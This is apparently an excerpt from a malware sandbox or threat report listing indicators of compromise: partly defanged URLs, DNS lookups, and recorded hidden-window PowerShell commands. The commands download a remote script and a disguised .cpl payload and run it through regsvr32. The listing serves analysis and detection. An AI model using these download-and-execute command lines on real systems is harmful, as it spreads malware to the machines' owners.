Technical Information
- http://20#.#8.69.83/img001.jpg as %programdata%\kvxwqusgwjzg__ps_\kvxwqusgwjzg__ps_.cpl
- http://bi#.ly/1fhgm9e
- http://bi#.ly/1fhgM9E
- DNS ASK bi#.ly
- DNS ASK bi##y.com
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' (new-object net.webclient).DownloadString('http://bi#.ly/1fhgM9E')' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' (New-Object System.Net.WebClient).DownloadFile('http://20#.#8.69.83/img001.jpg','%PROGRAMDATA%\kvxwqusgwjzg__ps_\kvxwqusgwjzg__ps_.cpl');Start-Process regsvr32 '%PROGRAMDATA%\kvxwqusgwjzg__ps_\...' (with hidden window)
- '%WINDIR%\syswow64\regsvr32.exe' %PROGRAMDATA%\kvxwqusgwjzg__ps_\kvxwqusgwjzg__ps_.cpl